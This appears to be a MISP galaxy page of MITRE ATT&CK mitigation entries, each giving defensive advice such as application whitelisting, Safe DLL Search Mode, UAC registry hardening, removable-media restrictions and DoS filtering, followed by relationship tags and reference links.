The tag is: misp-galaxy:mitre-course-of-action="Data from Removable Media Mitigation - T1025"

View relationships graph

Data from Removable Media Mitigation - T1025 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

Table 4078. Table References
Links
https://attack.mitre.org/mitigations/T1025
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Exfiltration Over Physical Medium Mitigation - T1052

Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Physical Medium Mitigation - T1052"

View relationships graph

Exfiltration Over Physical Medium Mitigation - T1052 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Physical Medium - T1052" with estimative-language:likelihood-probability="almost-certain"

Table 4079. Table References
Links
https://attack.mitre.org/mitigations/T1052
https://support.microsoft.com/en-us/kb/967715
https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx

Communication Through Removable Media Mitigation - T1092

The tag is: misp-galaxy:mitre-course-of-action="Communication Through Removable Media Mitigation - T1092"

View relationships graph

Communication Through Removable Media Mitigation - T1092 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"

Table 4080. Table References
Links
https://attack.mitre.org/mitigations/T1092
https://support.microsoft.com/en-us/kb/967715
https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx

File and Directory Discovery Mitigation - T1083

File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="File and Directory Discovery Mitigation - T1083"

View relationships graph

File and Directory Discovery Mitigation - T1083 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4081. Table References
Links
https://attack.mitre.org/mitigations/T1083
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

DLL Search Order Hijacking Mitigation - T1038

Disallow loading of remote DLLs. (Citation: Microsoft DLL Preloading) This is included by default in Windows Server 2012+ and is available by patch for XP+ and Server 2003+. (Citation: Microsoft DLL Search) Path Algorithm

Enable Safe DLL Search Mode to force search for system DLLs in directories with greater restrictions (e.g. <code>%SYSTEMROOT%</code>)to be used before local directory DLLs (e.g. a user’s home directory). The Safe DLL Search Mode can be enabled via Group Policy at Computer Configuration > [Policies] > Administrative Templates > MSS (Legacy): MSS: (SafeDllSearchMode) Enable Safe DLL search mode. The associated Windows Registry key for this is located at <code>HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SafeDLLSearchMode</code> (Citation: Microsoft DLL Search)

Use auditing tools capable of detecting DLL search order hijacking opportunities on systems within an enterprise and correct them. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for DLL hijacking weaknesses. (Citation: Powersploit)

Identify and block potentially malicious software that may be executed through search order hijacking by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="DLL Search Order Hijacking Mitigation - T1038"

View relationships graph

DLL Search Order Hijacking Mitigation - T1038 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038" with estimative-language:likelihood-probability="almost-certain"

Table 4082. Table References
Links
https://attack.mitre.org/mitigations/T1038
http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx
http://msdn.microsoft.com/en-US/library/ms682586
https://github.com/mattifestation/PowerSploit
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

File System Permissions Weakness Mitigation - T1044

Use auditing tools capable of detecting file system permissions abuse opportunities on systems within an enterprise and correct them. Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service binary target path locations. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for service file system permissions weaknesses. (Citation: Powersploit)

Identify and block potentially malicious software that may be executed through abuse of file, directory, and service permissions by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs. Deny execution from user directories such as file download directories and temp directories where able. (Citation: Seclists Kanthak 7zip Installer)

Turn off UAC’s privilege elevation for standard users <code>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]</code>to automatically deny elevation requests, add: <code>"ConsentPromptBehaviorUser"=dword:00000000</code> (Citation: Seclists Kanthak 7zip Installer). Consider enabling installer detection for all users by adding: <code>"EnableInstallerDetection"=dword:00000001</code>. This will prompt for a password for installation and also log the attempt. To disable installer detection, instead add: <code>"EnableInstallerDetection"=dword:00000000</code>. This may prevent potential elevation of privileges through exploitation during the process of UAC detecting the installer, but will allow the installation process to continue without being logged.

The tag is: misp-galaxy:mitre-course-of-action="File System Permissions Weakness Mitigation - T1044"

View relationships graph

File System Permissions Weakness Mitigation - T1044 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044" with estimative-language:likelihood-probability="almost-certain"

Table 4083. Table References
Links
https://attack.mitre.org/mitigations/T1044
https://github.com/mattifestation/PowerSploit
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://seclists.org/fulldisclosure/2015/Dec/34

System Network Connections Discovery Mitigation - T1049

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about network connections, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Network Connections Discovery Mitigation - T1049"

View relationships graph

System Network Connections Discovery Mitigation - T1049 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 4084. Table References
Links
https://attack.mitre.org/mitigations/T1049
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Service Registry Permissions Weakness Mitigation - T1058

Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Identify and block potentially malicious software that may be executed through service abuse by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.

The tag is: misp-galaxy:mitre-course-of-action="Service Registry Permissions Weakness Mitigation - T1058"

View relationships graph

Service Registry Permissions Weakness Mitigation - T1058 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Service Registry Permissions Weakness - T1058" with estimative-language:likelihood-probability="almost-certain"

Table 4085. Table References
Links
https://attack.mitre.org/mitigations/T1058
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Indicator Removal from Tools Mitigation - T1066

Mitigation is difficult in instances like this because the adversary may have access to the system through another channel and can learn what techniques or tools are blocked by resident defenses. Exercising best practices with configuration and security as well as ensuring that proper process is followed during investigation of potential compromise is essential to detecting a larger intrusion through discrete alerts.

Identify and block potentially malicious software that may be used by an adversary by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Indicator Removal from Tools Mitigation - T1066"

View relationships graph

Indicator Removal from Tools Mitigation - T1066 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1066" with estimative-language:likelihood-probability="almost-certain"

Table 4086. Table References
Links
https://attack.mitre.org/mitigations/T1066
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Exploitation for Privilege Escalation Mitigation - T1068

Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Privilege Escalation Mitigation - T1068"

View relationships graph

Exploitation for Privilege Escalation Mitigation - T1068 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 4087. Table References
Links
https://attack.mitre.org/mitigations/T1068
https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/
https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/
https://en.wikipedia.org/wiki/Control-flow_integrity

Bypass User Account Control Mitigation - T1088

Remove users from the local administrator group on systems. Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).

Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate. (Citation: Github UACMe)

The tag is: misp-galaxy:mitre-course-of-action="Bypass User Account Control Mitigation - T1088"

View relationships graph

Bypass User Account Control Mitigation - T1088 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088" with estimative-language:likelihood-probability="almost-certain"

Table 4088. Table References
Links
https://attack.mitre.org/mitigations/T1088
https://github.com/hfiref0x/UACME

Exploitation for Defense Evasion Mitigation - T1211

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Defense Evasion Mitigation - T1211"

View relationships graph

Exploitation for Defense Evasion Mitigation - T1211 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"

Table 4089. Table References
Links
https://attack.mitre.org/mitigations/T1211
https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/
https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/
https://en.wikipedia.org/wiki/Control-flow_integrity

Extra Window Memory Injection Mitigation - T1181

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Although EWM injection may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Extra Window Memory Injection Mitigation - T1181"

View relationships graph

Extra Window Memory Injection Mitigation - T1181 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1181" with estimative-language:likelihood-probability="almost-certain"

Table 4090. Table References
Links
https://attack.mitre.org/mitigations/T1181
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Exploitation for Credential Access Mitigation - T1212

The tag is: misp-galaxy:mitre-course-of-action="Exploitation for Credential Access Mitigation - T1212"

View relationships graph

Exploitation for Credential Access Mitigation - T1212 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"

Table 4091. Table References
Links
https://attack.mitre.org/mitigations/T1212
https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/
https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/
https://en.wikipedia.org/wiki/Control-flow_integrity

Component Object Model Hijacking Mitigation - T1122

Direct mitigation of this technique may not be recommended for a particular environment since COM objects are a legitimate part of the operating system and installed software. Blocking COM object changes may have unforeseen side effects to legitimate functionality.

Instead, identify and block potentially malicious software that may execute, or be executed by, this technique using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Component Object Model Hijacking Mitigation - T1122"

View relationships graph

Component Object Model Hijacking Mitigation - T1122 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1122" with estimative-language:likelihood-probability="almost-certain"

Table 4092. Table References
Links
https://attack.mitre.org/mitigations/T1122
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Data from Information Repositories Mitigation - T1213

To mitigate adversary access to information repositories for collection:

Develop and publish policies that define acceptable information to be stored
Appropriate implementation of access control mechanisms that include both authentication and appropriate authorization
Enforce the principle of least-privilege
Periodic privilege review of accounts
Mitigate access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) that may be used to access repositories

The tag is: misp-galaxy:mitre-course-of-action="Data from Information Repositories Mitigation - T1213"

View relationships graph

Data from Information Repositories Mitigation - T1213 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"

Table 4093. Table References
Links
https://attack.mitre.org/mitigations/T1213

Kernel Modules and Extensions Mitigation - T1215

Common tools for detecting Linux rootkits include: rkhunter (Citation: SourceForge rkhunter), chrootkit (Citation: Chkrootkit Main), although rootkits may be designed to evade certain detection tools.

LKMs and Kernel extensions require root level permissions to be installed. Limit access to the root account and prevent users from loading kernel modules and extensions through proper privilege separation and limiting Privilege Escalation opportunities.

Application whitelisting and software restriction tools, such as SELinux, can also aide in restricting kernel module loading. (Citation: Kernel.org Restrict Kernel Module)

The tag is: misp-galaxy:mitre-course-of-action="Kernel Modules and Extensions Mitigation - T1215"

View relationships graph

Kernel Modules and Extensions Mitigation - T1215 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Kernel Modules and Extensions - T1215" with estimative-language:likelihood-probability="almost-certain"

Table 4094. Table References
Links
https://attack.mitre.org/mitigations/T1215
http://rkhunter.sourceforge.net
http://www.chkrootkit.org/
https://patchwork.kernel.org/patch/8754821/

Network Share Connection Removal Mitigation - T1126

Follow best practices for mitigation of activity related to establishing [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).

Identify unnecessary system utilities or potentially malicious software that may be used to leverage network shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Share Connection Removal Mitigation - T1126"

View relationships graph

Network Share Connection Removal Mitigation - T1126 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1126" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"

Table 4095. Table References
Links
https://attack.mitre.org/mitigations/T1126
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Signed Script Proxy Execution Mitigation - T1216

Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Signed Script Proxy Execution Mitigation - T1216"

View relationships graph

Signed Script Proxy Execution Mitigation - T1216 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Signed Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 4096. Table References
Links
https://attack.mitre.org/mitigations/T1216

Execution through Module Load Mitigation - T1129

Directly mitigating module loads and API calls related to module loads will likely have unintended side effects, such as preventing legitimate software from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying and correlated subsequent behavior to determine if it is the result of malicious activity.

The tag is: misp-galaxy:mitre-course-of-action="Execution through Module Load Mitigation - T1129"

View relationships graph

Execution through Module Load Mitigation - T1129 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"

Table 4097. Table References
Links
https://attack.mitre.org/mitigations/T1129

Distributed Component Object Model Mitigation - T1175

Modify Registry settings (directly or using Dcomcnfg.exe) in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID{AppID_GUID}</code> associated with the process-wide security of individual COM applications. (Citation: Microsoft Process Wide Com Keys)

Modify Registry settings (directly or using Dcomcnfg.exe) in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole</code> associated with system-wide security defaults for all COM applications that do no set their own process-wide security. (Citation: Microsoft System Wide Com Keys) (Citation: Microsoft COM ACL)

Consider disabling DCOM through Dcomcnfg.exe. (Citation: Microsoft Disable DCOM)

Enable Windows firewall, which prevents DCOM instantiation by default.

Ensure all COM alerts and Protected View are enabled. (Citation: Microsoft Protected View)

The tag is: misp-galaxy:mitre-course-of-action="Distributed Component Object Model Mitigation - T1175"

View relationships graph

Distributed Component Object Model Mitigation - T1175 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175" with estimative-language:likelihood-probability="almost-certain"

Table 4098. Table References
Links
https://attack.mitre.org/mitigations/T1175
https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx
https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx
https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1
https://technet.microsoft.com/library/cc771387.aspx
https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653

Man in the Browser Mitigation - T1185

Since browser pivoting requires a high integrity process to launch from, restricting user permissions and addressing Privilege Escalation and [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) opportunities can limit the exposure to this technique.

Close all browser sessions regularly and when they are no longer needed.

The tag is: misp-galaxy:mitre-course-of-action="Man in the Browser Mitigation - T1185"

View relationships graph

Man in the Browser Mitigation - T1185 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"

Table 4099. Table References
Links
https://attack.mitre.org/mitigations/T1185

Hidden Files and Directories Mitigation - T1158

Mitigation of this technique may be difficult and unadvised due to the the legitimate use of hidden files and directories.

The tag is: misp-galaxy:mitre-course-of-action="Hidden Files and Directories Mitigation - T1158"

View relationships graph

Hidden Files and Directories Mitigation - T1158 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1158" with estimative-language:likelihood-probability="almost-certain"

Table 4100. Table References
Links
https://attack.mitre.org/mitigations/T1158

Data Encrypted for Impact Mitigation - T1486

Consider implementing IT disaster recovery plans that contain procedures for regularly taking and testing data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP)

In some cases, the means to decrypt files affected by a ransomware campaign is released to the public. Research trusted sources for public releases of decryptor tools/keys to reverse the effects of ransomware.

Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data Encrypted for Impact Mitigation - T1486"

View relationships graph

Data Encrypted for Impact Mitigation - T1486 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 4101. Table References
Links
https://attack.mitre.org/mitigations/T1486
https://www.ready.gov/business/implementation/IT
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Network Denial of Service Mitigation - T1498

When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)

Depending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)

As immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)

The tag is: misp-galaxy:mitre-course-of-action="Network Denial of Service Mitigation - T1498"

View relationships graph

Network Denial of Service Mitigation - T1498 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="almost-certain"

Table 4102. Table References
Links
https://attack.mitre.org/mitigations/T1498
http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf

Endpoint Denial of Service Mitigation - T1499

Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport. To defend against SYN floods, enable SYN Cookies.

The tag is: misp-galaxy:mitre-course-of-action="Endpoint Denial of Service Mitigation - T1499"

View relationships graph

Endpoint Denial of Service Mitigation - T1499 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="OS Exhaustion Flood - T1499.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Service Exhaustion Flood - T1499.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Exhaustion Flood - T1499.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004" with estimative-language:likelihood-probability="almost-certain"

Table 4103. Table References
Links
https://attack.mitre.org/mitigations/T1499
http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf

Exploit Public-Facing Application Mitigation - T1190

Application isolation and least privilege help lesson the impact of an exploit. Application isolation will limit what other processes and system features the exploited target can access, and least privilege for service accounts will limit what permissions the exploited process gets on the rest of the system. Web Application Firewalls may be used to limit exposure of applications.

Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.

Use secure coding best practices when designing custom software that is meant for deployment to externally facing systems. Avoid issues documented by OWASP, CWE, and other software weakness identification efforts.

Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.

The tag is: misp-galaxy:mitre-course-of-action="Exploit Public-Facing Application Mitigation - T1190"

View relationships graph

Exploit Public-Facing Application Mitigation - T1190 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 4104. Table References
Links
https://attack.mitre.org/mitigations/T1190

Two-Factor Authentication Interception Mitigation - T1111

Remove smart cards when not in use. Protect devices and services used to transmit and receive out-of-band codes.

Identify and block potentially malicious software that may be used to intercept 2FA credentials on a system by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Two-Factor Authentication Interception Mitigation - T1111"

View relationships graph

Two-Factor Authentication Interception Mitigation - T1111 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Two-Factor Authentication Interception - T1111" with estimative-language:likelihood-probability="almost-certain"

Table 4105. Table References
Links
https://attack.mitre.org/mitigations/T1111
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

.bash_profile and .bashrc Mitigation - T1156

Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.

The tag is: misp-galaxy:mitre-course-of-action=".bash_profile and .bashrc Mitigation - T1156"

View relationships graph

bash_profile and .bashrc Mitigation - T1156 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Malicious Shell Modification - T1156" with estimative-language:likelihood-probability="almost-certain"

Table 4106. Table References
Links
https://attack.mitre.org/mitigations/T1156

System Owner/User Discovery Mitigation - T1033

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="System Owner/User Discovery Mitigation - T1033"

View relationships graph

System Owner/User Discovery Mitigation - T1033 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 4107. Table References
Links
https://attack.mitre.org/mitigations/T1033
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
